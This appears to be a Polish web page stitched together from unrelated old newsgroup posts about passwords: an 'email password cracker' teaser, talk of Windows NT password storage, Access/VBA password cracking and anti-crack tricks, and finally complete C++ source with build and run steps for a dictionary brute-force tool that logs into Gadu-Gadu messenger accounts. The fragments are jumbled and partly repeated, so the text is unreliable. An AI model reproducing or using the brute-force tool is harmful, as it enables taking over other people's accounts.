kaniagostyn *UKS Kania Gostyń

!!! ŁAMACZ HASEŁ KONT E-MAIL TUTAJ !!!.

Mój chłopak, który jest hakerem dał mi to przed naszym zerwaniem,
to łamacz haseł kont e-mailowych metoda brute force, działa na konta
na onecie, interii, go2 i wielu innych


A jak jak odchodziłem od swojej dziewczyny dziesięć lat temu dostałem od
swojej dziewczyny kod źródłowy do Windowsa XP ale go nie opublikuje. Cudowna
Hackerka była.

On Sat, 10 Nov 2001,         Almight wrote:

+ gdzie sa ukryte hasła (w rejestrze?)?


AFAIK nie. Dla porządku: wypowiadam się tylko per analogiam :)
 o tyle o ile mi wiadomo. Dotyczy również poniższych uwag :)

+ czy jest mozliwosc ich odszyfrowania? w jakim czasie?


 *O ile wiem* to WNT (i++) mają szyfrowanie zbliżone
do VMSa, "64-bit with little salt" - możesz z grubsza
biorąc wybić sobie z głowy rozszyfrowanie inną metodą
niż słownikową, czyli na świadomego administratora
"łamacz haseł" (zakładając że zbiór ukradniesz z backupu ;))
nie pomoże. Za coś i po coś Cutlera ściągnęli :)

 Nie zmienia to faktu, że reszta kodu była napisana jak
była - znany jest bug pt. "klucz do zamka Gerda leżący
pod wycieraczką" - w którejś-tam wersji WNT hasło "w toku"
było zapisywane w postaci "lekko zaszyfrowanej" (8-bit)
do zbioru tymczasowego :(resztę można sobie dośpiewać :]
- czasem wręcz zbiór mógł zostać na dysku...)
 Ile takich błędów jeszcze jest ?!

 Inaczej mówiąc: technologia raczej nie do złamania
(czytaj: w najbliższym czasie).
 Implementacja... no coż, "Windowsy tak mają" :) !

 Pozdrowienia, Gotfryd

Dzięki !!!
Marek

Ad 1) Bez VB nie da rady.


Co to znaczy "bez VB nie da rady"? Zabezpieczenia na poziomie
użytkownika (nie mylić z prostym hasłem na bazę) można ustanawiać
klikając myszką, tudzież z grubsza odpowiednim kreatorem. Oczywiście,
bardziej zaawansowane operacje (niektóre niedostepne klikaniem) można
robić kodem VB.

Ustawiasz hasło dla bazy - łamacz jest na
| Z góry przepraszam za koncert życzeń ALE :

| Czy Ktoś może mi wyjaśnić metodę ( najlepiej step by step ) zabezpieczenia
| bazy w Accesie, konfiguracji grup, użytkowników i przydzielania uprawnień.
| Czy jest tu konieczne stosowanie kodu VB.


<...

najlepiej załóż pytanie o haslo powiedzmy po miesiącu ( zapisz w rejestrze
date instalki, w jakimś pojebanym kluczu ). W inputquery podaj namiary na
siebie ( mail, telefon ), sprawdzisz wtedy kto tak naprawdę pyta. Duże
polskie firmy tak robią ( MSM ), działa.


Pozatym:
Proponuje spakowac execa jakims pakerem, troche pomaga bo nie mozna
zrobic cracka, haslo musi byc kodowane w jakis dobry i NIEODWRACALNY
sposob, warto troche nad tym pomyslec i w zadnym wypadku nie sprawdzac
przez if password := good_pass then ... bo to nie ma sensu, i okienka te
w ktorych wpisujesz chaslo tez niech beda wylywane w bardziej
skomplikowany sposob bo showwindow czy dialogboxparam to prostota
wykoniania, do tego moze jakies sprawdzana sumy kontrolnej, aha i kiedy
program sie zaladuje do pamieci niech zostanie skopiowany kilka razy to
loader bedzie mial niejakie problemy ( tak czytalem, nie testowalem ) Co
pozatym? Zabezpieczenia anti-debug anti-disasm zeby nie mozna bylo zbyt
latwo podejzec sobie kodu, to poczatkujacym utrudni troche zycie, bo w
zasadzie jest to juz dosc dobrze "obcykane".
I jeszcze jedno: skontaktuj sie z tymi ktorzy te zabezpieczenia lamia a
nie tylko tymi co je tworza, lamacze wyjasnia ci to nawet dosc chetnie,
looknij moze sobie na www.crackpl.site.pl.

Nie tak dawno miała miejsce na grupie dość długa i ciekawa dyskusja na temat
zabezpieczeń baz danych. Niestety dyskusja dotyczyła wersji Acc 97 i częśc
iowo 2.0 natomiast w Acc 2000 pojawiły się inne ciekawe właściwości o które
chciałbym spytać - blokada D&D i zabezpieczenie modułu VBA hasłem - a pyta
nie jest następujące:

Czy znacie jakiś skuteczny program łamiący hasło zabezpieczające kod modułu
VBA w Ac 2000 ?

Sprawdzałem VBA key i Advanced VBA pas......... ale zupełnie nie dają sobie
rady ....

Pytanie powyższe zadaję z kilku powodów:
Dla mnie elementami które najbardziej chcę chronić w aplikacji są moduły i
moduły klas - kod krótko mówiąc (we wcześniejszej dyskusji padały zdania t
ypu - jak ktoś kupił bazę nie będzie chciał się do niej włamać... i zgadzam
się z powyższym - ale zdarzają się różne wypadki....
Z resztą ja faktu uzyskania przez kogoś dostępu do tej części projektu jaki
stanowią tabele, kwerendy i makra (których z resztą nie używam), nie uznał
bym za jakąś dotkliwą stratę .... ale podpatrzenie kodu to co innego. W ta
belach i zapytaniach nie wiele można odkrywczego wymyśleć - a w kodzie i o
wszem.

Oczywiście tu jeszcze punkt widzenia zależy od punktu siedzenia - właściciel
bazy raczej będzie chciał chronić tabele - bo tam ma cenne dane - a projek
tant kod programu bo to jego dorobek intelektualny (a nie open source ;-)

W każdym razie chciałbym jako ktoś kto tworzy coś pod Acc chronić swoją wł
asność a fakt istnienia programu łamiącego hasła modułów zmienia moje pode
jście do zabezpieczeń - łamacz jest pliki będą *.mde (co narzuca sporo ogr
aniczeń - w kwestii raportów chciażby), łamacza niet - pliki mogą być mde -
co ułatwić może życie w niektórych wypadkach.

No i trzeci niecny powód dla jakiego chciałbym wiedzieć o programiku do ła
mania haseł to wiadomo .... czasem chciało by się coś podejrzeć ;-)

Tak więc jak coś wiecie w powyższym temacie, to napiszcie proszę :-)

Pozdrowienia,

Marcin A.

Liquid wrote in message <38EA5FC6.5B0A@kki.net.pl...
najlepiej załóż pytanie o haslo powiedzmy po miesiącu ( zapisz w rejestrze
date instalki, w jakimś pojebanym kluczu ). W inputquery podaj namiary na
siebie ( mail, telefon ), sprawdzisz wtedy kto tak naprawdę pyta. Duże
polskie firmy tak robią ( MSM ), działa.
Pozatym:
Proponuje spakowac execa jakims pakerem, troche pomaga bo nie mozna
zrobic cracka, haslo musi byc kodowane w jakis dobry i NIEODWRACALNY
sposob, warto troche nad tym pomyslec i w zadnym wypadku nie sprawdzac
przez if password := good_pass then ... bo to nie ma sensu, i okienka te
w ktorych wpisujesz chaslo tez niech beda wylywane w bardziej
skomplikowany sposob bo showwindow czy dialogboxparam to prostota
wykoniania, do tego moze jakies sprawdzana sumy kontrolnej, aha i kiedy
program sie zaladuje do pamieci niech zostanie skopiowany kilka razy to
loader bedzie mial niejakie problemy ( tak czytalem, nie testowalem ) Co
pozatym? Zabezpieczenia anti-debug anti-disasm zeby nie mozna bylo zbyt
latwo podejzec sobie kodu, to poczatkujacym utrudni troche zycie, bo w
zasadzie jest to juz dosc dobrze "obcykane".
I jeszcze jedno: skontaktuj sie z tymi ktorzy te zabezpieczenia lamia a
nie tylko tymi co je tworza, lamacze wyjasnia ci to nawet dosc chetnie,
looknij moze sobie na www.crackpl.site.pl.

Być może sie mylę, ale moje osobiste zdanie jest takie, że jeżeli napiszesz naprawdę dobry program to bez względu na to jakie
zabezpieczenia porobisz znajdzie się człowiek/ludzie, którzy się pofatygują i je złamią.
Aha - i jeszcze jedno, napisałeś coś o zabezpieczeniu anti-disasm. Chcesz powiedzieć, że istnieje jakieś zabezpieczenie, które nie
pozwala zrobić z exec'a asm'a? Nie wydaje mi się... (chociaż mogę znów się mylić).
Pozdrawiam:

Instalacja:
Sciagamy libgadu, rozpakowywujemy, kompilujemy, zapisujemy ponizszy
kod zrodlowy do plku gg_brutal.cpp i umieszczamy w katalogu examples.
Z katalogu examples kompilujemy poznisza komenda programik

g++  -I.. -I../lib -I../src gg_brutal.cpp -o gg_brutal ../lib/libgadu.a -lssl -lcrypto

Odpalamy:

./gg_brutal uin slownik

Przykladowe slowniki sciagmy stad:

http://packetstormsecurity.nl/Crackers/wordlists/

/*
 * GADU-GADU brutal force
 *
 */

#include <stdio.h
#include <stdlib.h
#include <string.h
#include <errno.h
#include "libgadu.h"

#include <unistd.h

#include <iostream

#include <fstream
using namespace std;

int main(int argc, char **argv)
{
        struct gg_session *sess;
        struct gg_event *e;
        struct gg_login_params p;

if (argc < 3)
        {
        std::cout<<"usage: <uin<password_file ";
        return 0;
        }      

        gg_debug_level = 0;

        memset(&p, 0, sizeof(p));
        p.uin = atoi(argv[1]);
        //p.password = argv[2];

 char buffer[500];

ifstream INFILE(argv[2], ios::in);

if(!INFILE) {
cerr<<"dictionary could not be opened"<<endl;
exit(1);

}


        while (!INFILE.eof())
        {

                INFILE.getline(buffer, sizeof(buffer));
                p.password = buffer;

                cout<<" NEXT: ";
                cout<<p.password;

                if(sess = gg_login(&p))
                {
                cout<<" WE HAVE PASSWORD !!!!! : "<<p.password << " " ;

                        gg_logoff(sess);
                        gg_free_session(sess);
                        return 0;

                }

        }

  cout<<" failed to crack the password :( ";

        gg_free_session(sess);

        return 0;

}


--
(o_  compbatant    
//   gg:1256576 xbzcong@b2.cy <- rot13 :)
V_/_  http://compbatant.kgb.pl/
Linux 2.4.20-gentoo-r6